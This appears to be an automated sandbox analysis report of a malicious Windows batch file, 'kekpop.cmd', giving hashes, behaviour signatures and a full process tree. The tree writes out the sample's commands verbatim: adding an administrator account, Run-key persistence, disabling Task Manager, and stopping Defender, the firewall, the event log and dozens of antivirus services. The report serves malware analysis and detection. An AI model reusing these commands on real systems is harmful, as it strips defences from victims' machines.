Analysis
-
max time kernel
75s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
13-05-2022 16:49
Static task
static1
Behavioral task
behavioral1
Sample
kekpop.cmd
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
kekpop.cmd
Resource
win10v2004-20220414-en
General
-
Target
kekpop.cmd
-
Size
47KB
-
MD5
f190183b6a6f55daa406c25cf5da66d8
-
SHA1
89168542e0cec21bbafeafe39361994194576f61
-
SHA256
ea81248fddbf9080018845bf7862b9ceb8ab942526c1adcf20030f043c57ad99
-
SHA512
e28483273e68945b12baf8319ddafc58a65e82883c79fec47add970429f7b8ac02d91b7f68612058c0530ae6bfd66af959a0f6222e09acc81e816ca34c3ec448
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Disables Task Manager via registry modification
-
Modifies Windows Firewall 1 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_6759_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kekpop.cmd" reg.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\.bat" reg.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1664 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
-
NTFS ADS 1 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Temp\%qBRee:~23 cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
powershell.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exepowershell.exepid process 1468 powershell.exe 1468 powershell.exe 1868 tskill.exe 1868 tskill.exe 1656 tskill.exe 1656 tskill.exe 560 tskill.exe 560 tskill.exe 1340 tskill.exe 1340 tskill.exe 1672 tskill.exe 1672 tskill.exe 1900 tskill.exe 1900 tskill.exe 812 tskill.exe 812 tskill.exe 1688 tskill.exe 1688 tskill.exe 968 tskill.exe 968 tskill.exe 1904 tskill.exe 1904 tskill.exe 1276 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exetaskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 1468 powershell.exe Token: SeDebugPrivilege 1664 taskkill.exe Token: SeDebugPrivilege 1276 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exenet.execmd.exenet.exenet.exenet.exedescription pid process target process PID 1296 wrote to memory of 1988 1296 cmd.exe attrib.exe PID 1296 wrote to memory of 1988 1296 cmd.exe attrib.exe PID 1296 wrote to memory of 1988 1296 cmd.exe attrib.exe PID 1296 wrote to memory of 1468 1296 cmd.exe powershell.exe PID 1296 wrote to memory of 1468 1296 cmd.exe powershell.exe PID 1296 wrote to memory of 1468 1296 cmd.exe powershell.exe PID 1296 wrote to memory of 1564 1296 cmd.exe net.exe PID 1296 wrote to memory of 1564 1296 cmd.exe net.exe PID 1296 wrote to memory of 1564 1296 cmd.exe net.exe PID 1564 wrote to memory of 1760 1564 net.exe net1.exe PID 1564 wrote to memory of 1760 1564 net.exe net1.exe PID 1564 wrote to memory of 1760 1564 net.exe net1.exe PID 1296 wrote to memory of 1608 1296 cmd.exe reg.exe PID 1296 wrote to memory of 1608 1296 cmd.exe reg.exe PID 1296 wrote to memory of 1608 1296 cmd.exe reg.exe PID 1296 wrote to memory of 1820 1296 cmd.exe reg.exe PID 1296 wrote to memory of 1820 1296 cmd.exe reg.exe PID 1296 wrote to memory of 1820 1296 cmd.exe reg.exe PID 1296 wrote to memory of 1628 1296 cmd.exe reg.exe PID 1296 wrote to memory of 1628 1296 cmd.exe reg.exe PID 1296 wrote to memory of 1628 1296 cmd.exe reg.exe PID 1296 wrote to memory of 1548 1296 cmd.exe rundll32.exe PID 1296 wrote to memory of 1548 1296 cmd.exe rundll32.exe PID 1296 wrote to memory of 1548 1296 cmd.exe rundll32.exe PID 1296 wrote to memory of 1532 1296 cmd.exe cmd.exe PID 1296 wrote to memory of 1532 1296 cmd.exe cmd.exe PID 1296 wrote to memory of 1532 1296 cmd.exe cmd.exe PID 1296 wrote to memory of 1340 1296 cmd.exe net.exe PID 1296 wrote to memory of 1340 1296 cmd.exe net.exe PID 1296 wrote to memory of 1340 1296 cmd.exe net.exe PID 1340 wrote to memory of 1772 1340 net.exe net1.exe PID 1340 wrote to memory of 1772 1340 net.exe net1.exe PID 1340 wrote to memory of 1772 1340 net.exe net1.exe PID 1296 wrote to memory of 1664 1296 cmd.exe taskkill.exe PID 1296 wrote to memory of 1664 1296 cmd.exe taskkill.exe PID 1296 wrote to memory of 1664 1296 cmd.exe taskkill.exe PID 1532 wrote to memory of 1700 1532 cmd.exe scrnsave.scr PID 1532 wrote to memory of 1700 1532 cmd.exe scrnsave.scr PID 1532 wrote to memory of 1700 1532 cmd.exe scrnsave.scr PID 1296 wrote to memory of 1560 1296 cmd.exe net.exe PID 1296 wrote to memory of 1560 1296 cmd.exe net.exe PID 1296 wrote to memory of 1560 1296 cmd.exe net.exe PID 1560 wrote to memory of 1868 1560 net.exe net1.exe PID 1560 wrote to memory of 1868 1560 net.exe net1.exe PID 1560 wrote to memory of 1868 1560 net.exe net1.exe PID 1296 wrote to memory of 700 1296 cmd.exe net.exe PID 1296 wrote to memory of 700 1296 cmd.exe net.exe PID 1296 wrote to memory of 700 1296 cmd.exe net.exe PID 700 wrote to memory of 1012 700 net.exe net1.exe PID 700 wrote to memory of 1012 700 net.exe net1.exe PID 700 wrote to memory of 1012 700 net.exe net1.exe PID 1296 wrote to memory of 1840 1296 cmd.exe net.exe PID 1296 wrote to memory of 1840 1296 cmd.exe net.exe PID 1296 wrote to memory of 1840 1296 cmd.exe net.exe PID 1840 wrote to memory of 1224 1840 net.exe net1.exe PID 1840 wrote to memory of 1224 1840 net.exe net1.exe PID 1840 wrote to memory of 1224 1840 net.exe net1.exe PID 1296 wrote to memory of 952 1296 cmd.exe netsh.exe PID 1296 wrote to memory of 952 1296 cmd.exe netsh.exe PID 1296 wrote to memory of 952 1296 cmd.exe netsh.exe PID 1296 wrote to memory of 1072 1296 cmd.exe cmd.exe PID 1296 wrote to memory of 1072 1296 cmd.exe cmd.exe PID 1296 wrote to memory of 1072 1296 cmd.exe cmd.exe PID 1296 wrote to memory of 1736 1296 cmd.exe cmd.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\kekpop.cmd"1⤵
- NTFS ADS
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\kekpop.cmd2⤵
- Views/modifies file attributes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD3⤵
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_6759_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\kekpop.cmd /f2⤵
- Adds Run key to start application
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\.bat /f2⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f2⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵
-
C:\Windows\system32\net.exenet stop "WinDefend"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet stop "wuauserv"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"3⤵
-
C:\Windows\system32\net.exenet stop "security center"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"3⤵
-
C:\Windows\system32\net.exenet stop sharedaccess2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess3⤵
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\net.exenet stop "Security Center" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center" /y3⤵
-
C:\Windows\system32\net.exenet stop "Automatic Updates" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Automatic Updates" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵
-
C:\Windows\system32\net.exenet stop "SAVScan" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVScan" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Firewall Monitor Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto-Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee Spamkiller Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee Personal Firewall Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee SecurityCenter Update Manager" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec SPBBCSvc" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y3⤵
-
C:\Windows\system32\net.exenet stop "Ahnlab Task Scheduler" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y3⤵
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop vrmonsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vrmonsvc /y3⤵
-
C:\Windows\system32\net.exenet stop MonSvcNT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MonSvcNT /y3⤵
-
C:\Windows\system32\net.exenet stop SAVScan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVScan /y3⤵
-
C:\Windows\system32\net.exenet stop NProtectService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NProtectService /y3⤵
-
C:\Windows\system32\net.exenet stop ccSetMGR /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMGR /y3⤵
-
C:\Windows\system32\net.exenet stop ccEvtMGR /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMGR /y3⤵
-
C:\Windows\system32\net.exenet stop srservice /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop srservice /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Network Drivers Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton Unerase Protection" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton Unerase Protection" /y3⤵
-
C:\Windows\system32\net.exenet stop MskService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MskService /y3⤵
-
C:\Windows\system32\net.exenet stop MpfService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MpfService /y3⤵
-
C:\Windows\system32\net.exenet stop mcupdmgr.exe /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mcupdmgr.exe /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeAntiSpyware" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y3⤵
-
C:\Windows\system32\net.exenet stop helpsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop helpsvc /y3⤵
-
C:\Windows\system32\net.exenet stop ERSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ERSvc /y3⤵
-
C:\Windows\system32\net.exenet stop "*norton*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*norton*" /y3⤵
-
C:\Windows\system32\net.exenet stop "*Symantec*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*Symantec*" /y3⤵
-
C:\Windows\system32\net.exenet stop "*McAfee*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*McAfee*" /y3⤵
-
C:\Windows\system32\net.exenet stop ccPwdSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccPwdSvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Serv-U" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Serv-U" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "NAV Alert" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NAV Alert" /y3⤵
-
C:\Windows\system32\net.exenet stop "Nav Auto-Protect" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Nav Auto-Protect" /y3⤵
-
C:\Windows\system32\net.exenet stop "McShield" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield" /y3⤵
-
C:\Windows\system32\net.exenet stop "DefWatch" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "DefWatch" /y3⤵
-
C:\Windows\system32\net.exenet stop eventlog /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop eventlog /y3⤵
-
C:\Windows\system32\net.exenet stop InoRPC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRPC /y3⤵
-
C:\Windows\system32\net.exenet stop InoRT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRT /y3⤵
-
C:\Windows\system32\net.exenet stop InoTask /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoTask /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Corporate Edition" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y3⤵
-
C:\Windows\system32\net.exenet stop "ViRobot Professional Monitoring" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y3⤵
-
C:\Windows\system32\net.exenet stop "PC-cillin Personal Firewall" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y3⤵
-
C:\Windows\system32\net.exenet stop "Trend Micro Proxy Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "Trend NT Realtime Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend NT Realtime Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee.com McShield" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com McShield" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee.com VirusScan Online Realtime Engine" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y3⤵
-
C:\Windows\system32\net.exenet stop "SyGateService" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SyGateService" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus Network" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Job Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Realtime Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus RPC Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y3⤵
-
C:\Windows\system32\net.exenet stop netsvcs2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop netsvcs3⤵
-
C:\Windows\system32\net.exenet stop spoolnt2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop spoolnt3⤵
-
C:\Windows\system32\tskill.exetskill iexplore2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill msnmsgr2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill excel2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill iTunes2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill calc2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill msaccess2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill safari2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill mspaint2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill outlook2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\tskill.exetskill WINWORD2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\ApproveSkip.ps12⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\CloseDismount.clr2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\CloseSet.WTV2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\ConfirmConvertTo.ps12⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\ConnectGroup.ppsm2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\ExportTrace.xht2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\InitializeCompress.docx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\InstallBlock.xps2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\InvokeReset.wmf2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\LimitRevoke.jpe2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\NewLimit.3gp2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\NewMount.easmx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\OpenGroup.wmv2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\RedoRemove.MOD2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\RepairExport.xlsx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\ResolveConvertFrom.rmi2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\RestartApprove.aiff2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\SplitMeasure.pptx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\UndoRepair.wav2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\UnregisterCheckpoint.exe2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\Are.docx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\black.bat2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\ConvertFromEnable.rtf2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\DenyResume.ods2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\DismountPing.odt2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\ExitClear.odp2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\ExportSync.vsw2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\Files.docx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\FormatNew.mhtml2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\FormatUnlock.xml2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\GrantDebug.pps2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\ImportSearch.pps2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\JoinPush.xps2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\Opened.docx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\PingExpand.pub2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\PopGrant.vsx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\PublishWrite.docm2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\Recently.docx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\ShowUse.xla2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\StartAdd.odp2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\StartEdit.vssm2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\SuspendStop.vsdx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\SwitchInstall.pot2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\These.docx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\UninstallMerge.vst2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\UnpublishClear.docm2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\AddRestart.M2V2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\BackupDismount.fon2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\CloseFormat.raw2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\CompleteExport.wpl2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\DismountConvertTo.wmv2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\DismountRegister.xht2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\DismountUnprotect.easmx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\ExportSend.jpeg2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\GrantClose.wvx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\InitializeLimit.vdx2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\JoinRestore.M2T2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\LimitBackup.pps2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\OpenTest.jpg2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\OutStop.bat2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\PingConfirm.vst2⤵
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Music\RedoConfirm.kix2⤵
-
